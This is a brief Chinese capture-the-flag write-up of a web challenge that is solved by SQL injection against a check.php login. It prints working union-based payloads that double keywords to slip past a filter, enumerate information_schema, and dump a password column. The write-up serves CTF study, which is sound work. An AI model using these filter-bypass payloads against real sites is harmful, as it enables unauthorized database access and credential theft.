点进页面显示如下
查看源代码
先尝试一下万能密码
没用,or被过滤了
试着双写看看
回显一串,也不是flag
先查询列数尝试一下,把union select过滤了,使用双写
构造payload
/check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23
显示列数不对,往上加,加到3
(tips:因为要回显,所以需要设一个不是数据里面的用户,直接改成amdin1,回显字段为2和3)
成功
先查询数据库
构造payload
/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,database() %23
得到数据库geek
查询表
/check.php?username=admin&password=11' uunionnion sselectelect 1,(sselectelect group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema='geek'),3 %23
// 出现重写的都是被过滤的
有两个表,查询表中字段
/check.php?username=admin&password=1' uunionnion sselectelect 1,(sselectelect group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema='geek'),(sselectelect group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql')%23
得到三个字段
查询字段中的数据
/check.php?username=admin&password=1' uunionnion sselectelect 1,(sselectelect group_concat(passwoorrd) ffromrom b4bsql),(sselectelect group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql')%23
查看源代码可得到flag
考查重写绕过